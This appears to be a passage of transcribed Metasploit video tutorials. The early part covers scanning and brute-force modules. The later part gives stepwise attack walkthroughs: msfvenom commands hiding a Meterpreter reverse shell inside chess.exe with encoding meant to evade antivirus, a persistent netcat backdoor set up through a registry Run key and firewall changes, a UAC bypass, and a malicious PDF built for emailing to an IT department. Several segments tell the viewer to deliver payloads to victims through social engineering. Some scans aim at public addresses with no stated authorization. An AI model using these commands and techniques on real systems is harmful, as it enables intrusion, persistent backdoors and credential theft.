mainly used for providing shared access to files, printers and serial ports and miscellaneous communication between nodes on the network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows, where it was known as Microsoft Windows Network before the subsequent introduction of Active Directory. Corresponding Windows services are LAN Managed Server and LAN Manager Workstation. SMB version. The SMB version scanner connects to each workstation in a given range of hosts and determines the version of the SMB service that is running. Let's open up terminal and type msf console. Load SMB underscore version into the msf console. So type use auxiliary scanner SMB underscore version. Type info. Here we can see that module information, basic options, our host, the target address range or CIDR identifier, SMB domain, the Windows domain to use for authentication, and so on. Now set remote host target address as 192.168.0.4. Type set rhost 192.168.0.4. Let's execute it. Here you can see that 192.168.0.4 445 host is running on Windows 7 Ultimate OS, name as YTPC. So that's it in this video on SMB version, which is auxiliary module in Metasploit. Thank you for watching this video. So welcome, in this video we are going to learn SMTP auxiliary module in Metasploit. The SMTP enumeration module will connect to a given mail server and use a word list to enumerate users that are present on the remote system. Let's open up terminal and type msf console. Let's load SMTP enum module. Type use auxiliary / scanner SMTP SMTP_enum. Type info. Here you can see that basic options as rhost, the target address range or CIDR identifier, the R port, the target port, threads, the number of concurrent threads, and so on. Let's scan 192.168.0.17 host. Type nmap 192.168.0.17. Here you can see that 25 or TCP SMTP service is opened here. Using the module is a simple matter of feeding it a host or range of hosts to scan a word list containing username to enumerate. Let's set remote host address of a Metasploitable2 victim PC. Type set rhost 192.168.0.17. Type show options. Here you can see that all required options are set. Let's execute it. Here you can see that 192.168.0.17 25 banner 220 metasploitable.local domain ESMTP postfix. Banner is grabbed. Since the email username and system username are frequently the same, you can now use any enumerated users for further login attempts against other network services. So that's it in this video on SMTP enum, which is SMTP auxiliary module in Metasploit. Thank you for watching this video. Welcome, in this video we are going to learn SMTP version scanner, SMTP auxiliary module in Metasploit. Poorly configured or vulnerable mail server can often provide an initial foothold into a network, but prior to launching an attack, we want to fingerprint the server to make our targeting as precise as possible. The SMTP version module, as its name implies, will scan a range of IP addresses and determine the version of any mail servers it encounters. Let's open up MSF console, load SMTP version module into MSF console, type use auxiliary scanner SMTP version, type info. Here you can see that SMTP version module information, basic options as rhost, the target address range or CIDR identifier, R port, the target port, threads or number of concurrent threads, and so on. Let's set required module options. Type set rhost 192.168.0.17. Let's execute it. Here you can see that 192.168.0.17 25 SMTP 2220 metasploitable.local domain ESMTP postfix Ubuntu x0d x0a. So that's it in this video on SMTP version, which is a scanner SMTP auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn SSH brute force login in Metasploit. The SSH login module is quite versatile in that it can not only test a set of credentials across a range of IP addresses, but it can also perform brute force login attempts. We will pass a file to the module containing username and password separated by a space. This module will test SSH logins on range of machines and report successful logins. If we have loaded a database plugin and connected to a database, this module will record successful login and host so you can track your access. Let's open up terminal and type msf console, scan the 192.168.0.8 host, type nmap 192.168.0.8. It will take few minutes, so here I'm forwarding it. Load ssh underscore login space module. Type use auxiliary /scanner /ssh /ssh underscore login. Type info. Here you can see that module information. The basic options are blank passwords, try blank passwords for all the users, brute force speed, how fast to brute force from 0 to 5 and so on. Set remote host address as 192.168.0.7. Type set rhost 192.168.0.7. Set user and pass file to point to our list of credentials to attempt. Type set user underscore file root desktop usernames.txt. Same way, type set pass file root desktop passwords.txt. Let's execute it. Type exploit. Here you can see that brute force attack is started. If login is successful, it will terminate. So that's it in this video on SSH brute force login in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn SSL certificate information gathering in Metasploit. The SSL module queries a host or range of hosts and pull the SSL certificate information if present. Let's open up terminal, type msf console, load SSL module into the msf console, type use auxiliary /scanner /http /SSL. Type info. Here you can see that SSL module basic information. Module options are rhost, the target address range or CIDR identifier, rport, the target port, set remote host address as 192.168.1.100, type set rhost 192.168.1.100. Let's execute it. You can see SSL certificate information. So that's it in this video on SSL certificate information gathering in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn testing VNC server password for login in Metasploit. The VNC login auxiliary module will scan an IP address or range of IP addresses and attempt to login via VNC with either a provided password or a word list. Let's open up terminal, scan 192.168.0.8, type nmap 192.168.0.8, It will take few minutes, so here I'm forwarding it. Here you can see that port 5900 port is open for VNC. Let's open up Metasploit. Type MSF console. Type use auxiliary scanner VNC VNC _login. Type show option. Here you can see that module basic options. Blank password to try blank password for all users. Brute force speed, how fast to brute force from 0 to 5. DB all threads, try each user or password couple stored in current database. Our host, the target address range or CIDR identifier. Our port, the target port, and so on. Here I set our target range or address, threads, and perhaps the most importantly, the brute force speed value. Many newer VNC servers will automatically ban further login attempts if too many failed ones are made consecutively. Type set rhost 192.168.0.8. Type set username root. Here I am not setting thread value default, it is 1. We run the module. Notice in the output below that Metasploit automatically adjusts the retry interval after being notified of too many failed login attempts. Here you can see login is successful. So that's it in this video on testing VNC server password or login using Metasploit. Thank you for watching this video. Welcome, in this video we will see TCP idle scan in Metasploit. Idle scanning is more complex than any of the techniques discovered so far. You don't need to be a TCP or IP expert to understand it. It can be put together from these basic facts. First, one way to determine whether a TCP port is open to send SYN, that is session establishment packet, to the port. The target machine will respond with SYN or ACK packet if the port is open, and RST, that is reset, if the port is closed. This is on the basis of previously discussed SYN scan. Second, a machine that receives an unsolicited SYN or ACK packet will respond with the RST. An unsolicited RST will be ignored. Every IP packet on the internet has a fragment identification number, that is IP ID, since many operating systems simply increment this number for each packet they send. Probing for IP ID can tell an attacker how many packets have been sent since the last probe. Nmap's IP ID idle scanning allows us to be a little stealthy, scanning a target while spoofing the IP address of another host on the network. In order for this type of scan to work, we will need to locate a host that is idle on the network and uses IP ID sequences of either incremental or broken little and incremental. Metasploit contains the module scanner IP ID sequence to scan and look for a host that fits the requirements. Let's open up terminal and load MSF console. Let's use IP ID sequence module. Type use auxiliary /scanner /IP ID sequence. Let's type info. Here you can see that basic command information, interface, the name of the interface, our host, S, the target address range or CIDR identifier, our port S, the target port, snap ln 65535 as the target port, threads, number of concurrent threads, timeout, the reply read timeout in milliseconds. that is 500. Type set rhost 192.168.1.024. Type set threads 50. Let's run the module. Here you can see that IP ID sequence randomized. Judging by the result of our scan, we have a number of potential zombies we can use to perform idle scanning. So that's it in this video on TCP idle scan in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn TCP stream showing a bind shell in Metasploit. This module takes advantage of the default configuration of the RMI registry and RMI activation services, which allow loading classes from any remote URL, as it invokes a method in the RMI distributed garbage collector, which is available via every RMI endpoint. It can be used against both RMI registry and RMID and against most other RMI endpoints as well. Note that it does not work against Java Management Extension, that is JMX ports, since those do not support remote class loading unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication. Let's open up MSF console, load the Java RMI server module into the MSF console, type use exploit /multi misc Java RMI server, type info. Here you can see that module basic information. Now set the rhost as my victim PC address, that is 192.168.0.12. Type show option to display the available options. Load the module within the Metasploit console and run the command show option or show advanced. Finally exploit. Here you can see that my victim PC Metasploitable session has been opened here. That's it in this video on TCP stream showing in bind shell. Thank you for watching this video. Welcome. In this video we are going to learn TCP synchronous port scanning auxiliary module in Metasploit. Scanners and most other auxiliary module use the rhost option instead of just rhost. Rhost can take IP ranges like 192.168.1.20 to 192.168.1.30. CIDR ranges, that is 192.168.1.024, multiple ranges separated by commas like 192.168.1.024, 192.168.3.024, and line separated host list files, that is file tmp hostlist.txt. This is another use for grippable and map output file. By default, all of the scanner modules will have the threads value set to 1. The threads value sets a number of concurrent threads to use while scanning. Set this value to higher number in order to speed up your scans, or keep it lower in order to reduce network traffic. Keep the threads value under 16 on native Windows 32 system. Keep threads under 200 when running MSF under SIG-Win. On Unix-like operating system, threads can be set as high as 256. There are a variety of other port scanners that are available to us within the framework. Let's open up MSF console, load port scan SYN module, that is synchronous module, type use auxiliary /scanner /port scan /SYN. Type info. Here you can see that module information, basic options, batch size, the number of hosts to scan per set, delay, the delay between connection per thread in milliseconds, interface, the name of the interface, and so on. Let's set remote host address. Type set rhost 192.168.0.7, type set threads 50, see the options, type show options. Here you can see that all the option values are set. Let's run it. It will take few minutes. Here you can see that 192.168.0.7 21 port is open. So that's it in this video on TCP synchronous port scanning in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn TCP DCERPC auditor scanner DCERPC auxiliary module in Metasploit. The DCERPC or TCP DCERPC auditor module scans a range of IP addresses to determine what DCERPC services are available over a TCP port. Let's open up MSF console, type MSF console, load TCP DCERPC auditor auxiliary module, type use auxiliary /scanner DCERPC /TCP DCERPC auditor. Type info. Here you can see that module information basic option as rhost, the target address range or CIDR identifier, rport, the target port, threads, the number of concurrent threads. Let's run this scanner. We just need to set our rhost and thread values and let it run. Type set rhost 192.168.0.1 24, set threads 255. Let's execute it, type run. Here you can see that 192.168.0.4 135 port is open and access is granted. So that's it in this video on TCP DCERPC auditor in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn Telnet brute force login attack in Metasploit using Telnet login module. The Telnet login module will take a list of provided credential and a range of IP addresses and attempt to log in to any Telnet servers it encounters. Let's open up terminal, type MSF console. Let's load the Telnet login module. Type use auxiliary /scanner telnet _login. Type info. Here you can see that Telnet login module information. Let's see some basic options which are used for brute force attack on target PC. Blank password. Try blank password for all user. Brute force speed. How fast to brute force from 0 to 5. DB all creds. Try each user or password couple stored in current database and so on. This auxiliary module allows you to pass credential in a number of ways. You can specifically set a username and password. You can pass a list of username and a list of password for it to iterate through, or you can provide a file that contains username and passwords separated by a space. You will configure the scanner to use a short username file and a password file and let it run against our subnet. Let's set option value. Type set rhost 192.168.0.13. Here I created some random username and password saved in desktop. Set pass file root desktop password.txt. Set user file root desktop username.txt. Let's set verbose mode option as false. print output for all attempts. Type show option. Here you can see all required option values are set. Let's execute it. Type run. It will attempt all username and password to hit telnet again and again until login becomes successful. It seems that our scan has been successful and Metasploit has a few sessions open for us. Let's see if we can interact with one of them. Type sessions. Here you can see session is opened here. So that's it in this video on telnet brute force login in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn UDP sweep scanner discovery in Metasploit. The UDP sweep module scans across a given range of a host to detect commonly available UDP services. Let's open up MSF console. Type MSF console. Load UDP sweep module in MSF console. Type use auxiliary scanner discovery UDP_sweep. Type info. Here you can see that UDP sweep module information. Basic options as batch size, a number of hosts to probe in each set, are host the target address range or CIDR identifier, threads the number of concurrent threads, and so on. To configure this module, we just need to set our host and thread values and run it. Type set our host 192.168.1.124. Type set threads 255. Type run. Here you can see that sending 13 probes between 192.168.1.0 to 192.168.1.255 address. With minimal effort, we have once again identified a wide range of services running on many different platforms within our network. So that's it in this video on UDP sweep scanner discovery auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn VNC authentication vulnerability scanning module in Metasploit. VNC authentication check with the none scanner. The VNC authentication none scanner is an auxiliary module for Metasploit. This tool will search a range of IP addresses looking for targets that are running VNC server without a password configured. Pretty well, every administrator sets a password prior to allowing inbound connections, but you never know when you might catch a lucky break, and a successful pen test leaves no stone unturned. Once when doing a pen test, we came across a system on the target network with an open VNC installation. While we were documenting our findings, I noticed some activity on the system. It turns out someone else had found the system as well. An unauthorized user was live and active on the system at the same time. After engaging in some social engineering with the intruder, we were informed by the user they had just got into the system and came across it as they were scanning large chunks of IP addresses looking for open systems. Let's open up MSF console, load VNC_none_authentication module. So type use auxiliary /scanner VNC/VNC none authenticate. Type info. Here you can see that module information. Let's see the basic option for module. Our host the target address range or CIDR identifier. Our port the target port. Threads the number of concurrent threads. Set remote host address as 192.168.0.1/24. Type set rhost 192.168.0.1/24. Set threads as 50. Execute it, type run. Here we can see that VNC server protocol version 3.4.3. VNC security type supported VNC. So that's it in this video on VNC authentication vulnerability scanning module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn VNC non-authentication scanner, which is VNC auxiliary module in Metasploit. The VNC non-authentication scanner, as its name implies, scans a range of hosts for VNC servers that do not have any authentication set on them. Let's open up terminal, type msf console. Let's load the module VNC non-authenticate. Type use auxiliary scanner VNC underscore non-authenticate. Type info. Here you can see that module information. Let's see basic options. rhost the target address range or CIDR identifier. rport the target port by default 5900. Threads number of concurrent threads. Direct VMC server that support the non-authentication method. To run our scan, we simply set the rhost and thread values and let it run. Set remote host as 192.168.0.13. Type set rhost 192.168.0.13. rhost is set. Let's execute it. Here you can see in our scan result, we see that none of our target has wide open GUI access. So that's it in this video on VNC non-authentication scanner, VNC auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn web crawler in Metasploit. This auxiliary module is modular web crawler to be used in conjunction with WMAP or standalone. Let's open up MSF console and load MSF crawler module. Type use auxiliary /crawler MSF crawler. Type info. Here you can see that module information. Let's see basic option. Path, starting crawling path. rhost the target address range or CIDR identifier. rport remote host port and so on. Let's set rhost as anonymous website. Set thread as 30. Type threads 30. Type show options. Here you can see that all options are set. Let's execute it. Type exploit. Here we can see that anonymous website, all directory files and information with file names. So that's it in this video on web crawler in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn Windows patch enumeration in Metasploit. When confronted with a Windows target, identifying which patches have been applied is an easy way of knowing if regular updates happen. It may also provide information on other possible vulnerabilities present on the system. Let's open up terminal, type msf console. An auxiliary module was specifically created for just this task called enum_patches. Like any post-exploitation module, it is loaded using the use command. Type use post windows gather enum_patches. Type info. Here we can see that basic option as kb, a comma separated list of kb patches to search for. MSF locals, search for missing patches for which there is MSF local module. session the session to run this module on. Type sessions. Once a Meterpreter session has been initiated with our Windows target, load up enum_patches module, setting the session option. Here we can see that sessions, I already created a session, set session as 1, type set session 1. Let's execute it. Type run, command will launch the module against our target. So that's it in this video on Windows patch enumeration in Metasploit. Thank you for watching this video. Welcome, in this video we're going to learn WordPress login enum, which is auxiliary module in Metasploit. The WordPress login enum auxiliary module will brute force a WordPress installation and first determine valid username and then perform a password guessing attack. WordPress authentication brute force and user enumeration utility. Let's open up terminal and type msf console, load WordPress login enum into the WordPress, type use auxiliary scanner http WordPress_login_enum. Type info. Here you can see that module information, blank_passwords, try blank passwords for all users, brute force, perform brute force authentication, brute force_speed, how fast to brute force from 0 to 5, and so on. We configure the module first by pointing it to the path of wp-login.php on the target server. We then set our username and password file, set the rhost value and let it run. Type rhost 107.180.54.186. Type set threads 255. Here I created username and password text file. Type set user_file root/desktop/usernames.txt. Type set pass_file root/desktop/password.txt. Let's execute it. Type run. Here you can see that 107.180.54.186 does not seem to be WordPress site. Let's try it with 107.180.54.186.24. Here you can see that we found users with ID of anonymous random site. So that's it in this video on WordPress login enum auxiliary module in Metasploit. Thank you for watching this video. Welcome, in this video we are going to learn WordPress scanner, which is auxiliary module in Metasploit. The WordPress_scanner module detects WordPress installation and their version number. Let's open up terminal and type msf console, type use auxiliary /scanner/http/WordPress_scanner. Type info. You can see that module information, basic options as rhost, remote host address, threads. Let's set rhost as 107.180.54.186.24. Set threads 255. Let's execute it. You can see that it scans all IP address between 107.180.54.0 to 55. You can see WordPress banner and its version number. Using this number, you can get vulnerability reports and hack. So that's it in this video on WordPress scanner auxiliary module in Metasploit. Thank you for watching this video. Welcome, in this video we are going to learn msf-venom command. msf-venom is combination of msf payload and msf encode. Putting both of this tool into a single framework instance MSF Venom replaced both MSF Payload and MSF Encode as of June 8, 2015. The advantages of MSF Venom are one single tool, standardized command line option, increased speed. Let's open up terminal and type MSF Venom. Here you can see that basic usage of MSF Venom command, usage / MSF Venom options, variable equals to value. And let's take a look at some of the most important options in this list. The -p designates the Metasploit payload we want to use. -e designates the encoder we want to use. -a designates the architecture we want to use. -s designates the maximum size of the payload. -i designates the number of iterations with which to encode the payload. -x designates a custom executable file to use as a template, and so on. Encoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Type MSF Venom -l encoder. Metasploit will then list all of the available encoders with its rank and description. View the payload options. We can use MSF Venom to check the options that we need to set for any payload similar to show options in Metasploit console. The basic usage, MSF Venom -p payload name -o. Type MSF Venom -p Windows Meterpreter _TCP -0. If we want to work with this payload, we now know what options we need to set in the MSF Venom command. Let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and antivirus if we use a custom template. In this case, we'll use a chess game named chess.exe. MSF Venom -p Windows /Meterpreter /reverse_TCP lhost equals to 192.168.0.100. L port equals to 8080 -x user share chess.exe -e x86 /shikata _ganai -i 200 -f exe chess.exe -p Windows /Meterpreter reverse_TCP designates the payload we want to embed. lhost designates the local host. lport designates the port we want to listen on. -x designates the template we want to use and the path to it. -e x86 or Shikata GNAI designates the encoder we want to use. -i 200 represents the number of iterations. -f exe designates we want to create an executable that is .exe. Let's see the file. Type ls. Here you can see that chess.exe designates the name of the file created. When the victim clicks on the chess.exe file, the Meterpreter payload will be activated and will look to make a connection back to your system. So that's it in this video on MSF Venom Metasploit framework. Thank you for watching this video. Welcome. In this video, we are going to learn payload backdoor for hacking servers in Metasploit. This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal 3.2.8.1 tar.gz archive between November 2009 and June 12, 2010. Let's open up terminal, load MSF console. Let's search Unreal 3.2.1.8 module. Here you can see that exploit /Unix /Unreal IRCD 3281 backdoor. Type info exploit Unix Unreal IRCD 3281_backdoor. Here you can see that module information, load module type, use exploit Unix IRC Unreal IRCD 3281 backdoor. Type show options. Here you can see basic option. Let's set option value. Type set rhost 192.168.1.108. Let's see the payload type. Show payloads. Here you can see that Linux payloads. Set payload as CMD Unix reverse. Here you can see that payload is set. Open up another terminal and type ifconfig. Here you can see that localhost IP address for Kali OS is set lhost as 192.168.1.10. Exploit it. Here you can see that we get Metasploit session on 192.168.1.108 target host. So that's it in this video on payload backdoor for hacking server. Thank you for watching this video. Welcome. In this video we are going to learn persistent netcat backdoor in Metasploit. Instead of looking up information on remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall. Let's open up terminal, type sessions. Here I already created session. We must upload a copy of netcat to the remote system. Type upload user/share Windows binaries nc.exe c Windows System 32. Here you can see that nc.exe file is uploaded in remote PC. We work with the registry to have netcat execute on startup and listen on port 445. We do this by editing the key hklm/software Microsoft Windows current version run. Type reg enum key -k hklm software Microsoft Windows current version run. Here you can see that there is no children's. Let's set nc. Type reg set value -k hklm software Microsoft Windows current version run -v nc-d with single quote c Windows System 32 nc.exe -ldp 445 -e cmd.exe. Here you can see that nc successfully set. Type reg query value -k hklm software Microsoft Windows current version run -v nc. We need to alter the system to allow remote connection through the firewall to our netcat backdoor. We open an interactive command prompt and use netsh command to make changes, as it is far less error prone than altering registry directly. Plus the process shown should work across more versions of Windows, as the registry location and functions are highly version and the patch level dependent. Let's execute it. Type execute -f command -i. Type netsh firewall show op mode. We open up the port 445 in the firewall and double check it was set properly. Type netsh firewall add port opening TCP 445 service firewall enable all. Here you can see that netsh firewall add port opening TCP 445 service firewall enable all. Type netsh firewall show port opening. Here you can see that NetSH firewall show port opening. So with that being completed, we will reboot the system and test out netcat shell. Using nc-v IP address command, you can get session. In a real world situation, we would not be using such simple backdoor as this with no authentication or encryption. However, principle of this process remain the same for other changes to the system and other sorts of programs one might want to execute on startup. So that's it in this video on persistent netcat backdoor in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn remote Windows PC using Metasploit gen in Metasploit. This Python script generates Metasploit shellcode payloads in Windows batch file format, PowerShell script format, and MS Office Visual Basic macro format. The default Metasploit payloads are Windows/Metasploit /TCP and Windows/x64 Metasploit/TCP. If TCP port 443 is specified, the script will automatically generate an HTTPS payload also using Windows/Metasploit/HTTPS. The script will accept multiple TCP ports which are delimited. Let's open up terminal, download Metasploit gen tool, type git clone https bitbucket.org gshire /metasploitgen.git. Type cd space metasploitgen. Let's run metasploitgen.py Python file. Here we can see that basic usage of Metasploit tool, metasploitgen.py options. The options as -h help message, -lhost is equal to lhost, specify lhost for Metasploit payload, lport equals to lport, specify lport for Metasploit payloads, and so on. Type command to create payload, that is /metasploitgen.py -lhost 192.168.0.15 -lport 4444 -payload Windows Metasploit/TCP. Here we can see that Windows/Metasploit/TCP payload is created. Now we need to set up a listener to handle reverse connection sent by victim. Open up MSF console, type use exploit /multi/handler. Type set payload Windows/x64 Metasploit/reverse_TCP. Type show options. Here you can see that payload options as lhost and lport as 444. Let's set required field options. Type set lhost 192.168.0.15. Let's run type exploit. Now send your batch files to victim using any social engineering technique. Now when the victim will use exe, you will get Metasploit of victim PC. That's it in this video on remote Windows PC using Metasploit gen in Metasploit. Thank you for watching this video. Welcome. In this video we will try to compromise the target through VNC payload attack using very simple method for beginners. In this tutorial we will learn how to create VNC payload using set toolkit and try to achieve VNC shell of victim's PC. Let's open up set toolkit. A terminal will launch with Set Toolkit wizard. Here select first option to start social engineering attacks. Type 1. Now we have to select another option to choose any one attack. Select create a payload and listener. Type 4. Here we will select our payload option since we are performing VNC attack. Therefore we need to go with third option for VNC payload. Type 3. It requires IP address for payload listener. Type Kali IP address as 192.168.0.2. Then after that it will ask to enter the port for reverse listener and that will be 444. Now it starts generating VNC payload and save that payload under hidden path. It will take a minute. Here I am forwarding it. Payload is saved at root.set payload.exe and send payload.exe to target. It will ask to start payload listener. Type S and hit enter, which will start loading Metasploit framework. Here it launches Metasploit framework and start multi-handler automatically. Now once the victim click on payload.exe file sent by attacker will get victim's VNC shell. Our VNC attack using Set Toolkit is successful and we received victim's VNC shell on our system. So that's it in this video on capture VNC session of remote PC using Set Toolkit. Thank you for watching this video. Welcome. In this video we are going to bypass user access control, that is UAC, in targeted system. It is a post exploitation, hence attacker must exploit targeted system at first, then escalate UAC protection bypass via COM handler hijack. This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. Firstly, exploit the target to receive Meterpreter session of victim system. Once you get the Meterpreter session 1, let's open up terminal, type sessions. Here you can see that I already created session with YTPC. Now let's search our bypass module into the MSF. So type search bypass. Here you can see that bypass module. Let's copy it and load it into MSF. Type info. Target options as Windows 86 and Windows 64. Basic options as session. The session to run this module on. The technique to use if US is turned off. Module description. Type session. Here you can see that one active session is present. You can see that target OS is x86. Type set target 0. Now set session 1, which is active session ID. Type show option. You see that all required options are set. Here you see bypass Windows UAC by utilizing the trusted publisher certificate through process injection. The exploiting has failed, no problem. Let's re-execute it. You will get Meterpreter session. Type exploit. Here you can see that Meterpreter is opened. So that's it in this video on bypass UAC, that is bypass Windows UAC in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn how to write Meterpreter script in MSF console. There are a few things you need to keep in mind when creating a new Meterpreter script. Not all versions of Windows are the same. Some versions of Windows have security countermeasure for some of the commands. Not all command line tools are in all versions of Windows. Some of the command line tool switches vary depending on the version of Windows. The same constraints that you have when working with standard exploitation methods, the MSF can be of great help, but it can't change the fundamentals of that target. Keeping this in mind, we can save a lot of frustration. So keep your target's Windows version and service pack in mind and build to it. We are going to create a standalone binary that will be run on the target system that will create a reverse interpreter shell back to us. This will rule out any problem with an exploit as we work through our script development. Let's open up terminal and type ifconfig. Here you can see that our Kali IP address as 192.168.0.19 MSF Venom -a x86 -platform Windows -p Windows Interpreter reverse TCP lhost equals to 192.168.0.19 -p /x00-f exe-o meterpreter.exe. Type ls. You can see that meterpreter.exe backdoor file is created. Now we move the executable to our Windows machine that will be our target for the script we are going to write. Now we just have to set up our listener. To do this, let's create a short script to start up multi-handler for us. Type touch meterpreter.rc. Type echo use exploit multi-handler meterpreter.rc. Type echo set payload windows /meterpreter /reverse_tcp. Type echo set lhost 192.168.1.84. Type echo set exit on session false. Type echo exploit -j -z. Type cat meterpreter.rc. Here you can see that our meterpreter script. Here we are using the exploit multi-handler to receive our payload. We specify that the payload is meterpreter reverse_tcp payload. We set the payload option. We make sure that the multi-handler will not exit once it receives a session, since we might need to re-establish one due to an error, or we might be testing under different version of Windows from different target host. Let's type msf console -r meterpreter.rc. Here you can see that msf console handler listener is started. Let's send meterpreter.exe file using social engineering technique. Once user click on exe file, here you can see that we get meterpreter session. So that's it in this video on writing meterpreter script for Metasploit. Thank you for watching this video. Welcome. In this video we will see client-side exploit in Metasploit. Metasploit has many uses, and another one we will discuss here is client-side exploits. To show the power of how MSF can be used in client-side exploit. In the security world, social engineering has become an increasingly used attack vector. Even though technologies are changing, one thing that seems to stay the same is the lack of security with the people. Due to that, social engineering has become a very hot topic in security world today. After a successful dumpster dive and scrapping for emails from the web, gained two key pieces of information. The first one is they use best computer for technical services, and the second, the IT department has an email address of itdepartment@victim.com. We want to gain shell on the IT department's computer and run a keylogger to gain passwords and any other juicy tidbits of information. Open up terminal and let's start loading our MSF console. We want to create a malicious PDF that will give the victim a sense of security in opening it. To do that, it must appear legit. have a title that is realistic and not flagged by antivirus or other security alert software. We are going to be using the Adobe Reader util.printf JavaScript function stack buffer flow vulnerability. Adobe Reader is prone to stack-based buffer overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying the service to legitimate user. Let's load adobe_util printf module, type use exploit/windows/file format/adobe_util printf. Type info. Here we can see that module information basic option as file name for PDF, module description. Let's set payload option as set payload Windows Meterpreter reverse_TCP. Type show options. Here we can see that payload option lhost lport. Let's set the local host address. Type set lhost 192.168.1.109. Type set lport 8080. Let's exploit. Here you can see that details.pdf malicious PDF file is generated and saved in root.msf4/local/details.pdf. Before we send the malicious file to our victim, we need to set up a listener to capture this reverse connection. We will use MSF console to set up our multi-handler listener. Type use space exploit multi-handler. Type set payload Windows Meterpreter reverse TCP. Type set lhost 192.168.1.109. Type set lport 8080. Listener is waiting to receive its malicious payload. We have to deliver this payload to the victim, and since in our information gathering we obtained the email address of the IT department, we will use a handy little script called send email to deliver this payload to the victim. Once user open, we get Meterpreter session. So that's it in this video on the client-side exploit in Metasploit. Thank you for watching this video. Welcome. In this video, you will learn how an attacker will be able to generate SSL certificate for any exe or bat file payloads so that he might be able to establish a connection with the host through Meterpreter session. The firewall spoofs the network traffic and verifies trust certificates to establish connection itself as a trusted third party to the session between the clients and the server. When the client begins with an SSL session with the server, the firewall captures the client SSL request and forwards the SSL request to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the forward trust certificate and forward the certificate to the client to authenticate. Meterpreter paranoid mode.sh allows user to secure your staged or stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to. Open the terminal in your Linux. Type git clone github.com and so and so the URL of Meterpreter paranoid mode ssl.git. Here you can see that it is downloaded and run the program file. Let's change the terminal directory to Meterpreter paranoid mode ssl. Type cd Meterpreter paranoid mode ssl. Type ls. Here we can see that Meterpreter paranoid mode ssl.ssh shell program. Let's run it. Here I had chosen impersonate domain. We start by generating a certificate in PM format. Once the certificates have been created, we can create a HTTP or HTTPS or exe payload for it and give it the path of PM format certificate to be used to validate the connection. After that, again another prompt will open in which you will be asked to mention the domain name, type hackingtube.com. All certificates are created in root.msf/loot. Payload.exe is created. Once the payload is created, we need to create a handler to receive the connection, and again we use the PM certificate. So the handler can use the SHA1 hash for validation. Just like with the payload, we set the parameters handler SSLCRT with the path to the PM file and stager verify SSLCRT to true. Type lhost address 192.168.0.6. Here you can see that MSF module listening payload handler. When you move inside output folder, here you will get two files, first for exe payload, another for .pm certificate. Now use your effort for sharing exe file with your victim and wait for session establishment through Meterpreter. Once victim click on payload, you can see I have successfully established the Meterpreter session with the victim system. So that's it in this video on create SSL certified Meterpreter payload using npm in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn MS08067 NETPI module for exploiting Windows XP 2, that is Windows XP Service Pack 2. This security update resolves a privately reported vulnerability in the server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP and Windows Server 2003 system, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in crafting of vulnerable exploit. Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. This module exploits a parsing flaw in the path canonialization code of NetAPI 32.dll through the server service. This module is capable of bypassing NX on some operating system and service packs. The correct target must be used to prevent the server service from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module. Full support of NX bypass on 2003 along with other platforms is still in development. Let's open up terminal, type msf console. Let's load the ms08_067_NetAPI module. Type use /windows smb ms08_067 NetAPI. Set the payload as Windows Meterpreter reverse_TCP. See the basic option. The R host is remote target host address. R port the SMB service port address. SMB pipe the pipe name to use. Payload options as L host the listen host address. L port the listen port. Type show target. Here you can see that 72 target OS, Windows 2000 Universal, Windows XP Service Pack 0 or Service Pack 1 Universal, Windows 2003 Service Pack 0, Universal, and so on. Here I am attacking Windows Service Pack 2 OS. Type set target file, set remote host address, type set rhost 192.168.1.6, set local host address as type lhost 192.168.1.5, set lport as 8080. Let's see the option type show option. Here you can see that all options are set. Let's exploit it. Session 1 is opened here. So that's it in this video on exploiting XP Service Pack 2 in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn exploiting the module structure in Metasploit. It is very essential to understand the exploit module structure as it will help us in proper analysis of different exploit modules. As the Metasploit framework is an open source project, its development depends on the contribution from the community. Developers from around the globe convert proof of concept of various exploits into the Metasploit module so that it can be used by everyone. Hence, you can also contribute to the community by converting newly discovered exploit into modules. Also, there may be a situation where you need a particular exploit which is not in the framework. Knowledge about the exploit module structure will help you in easily converting the exploit into a module. In this video, we will get to know about the basic structure of a module. Let us start by understanding the modular structure of exploit within the framework. It is similar to an auxiliary structure with some specific fields. You can find the exploit modules in the pentest/exploits framework 3 directory. Let us analyze the structure of exploit in MSF. Let us see how we actually do it. As I discussed in previous video, the format of an exploit module is similar to that of an auxiliary one with some specific addition. Type require MSF/core. Type class Metasploit 3 less than MSF exploit remote. Type rank equals to excellent ranking. Include MSF exploit remote TCP. Include MSF exploit exe. The module starts with including the MSF core libraries into the script along with declaration of a class which extends the properties relevant to the exploit. In this example, the Metasploit 3 class extends the remote exploit libraries. In 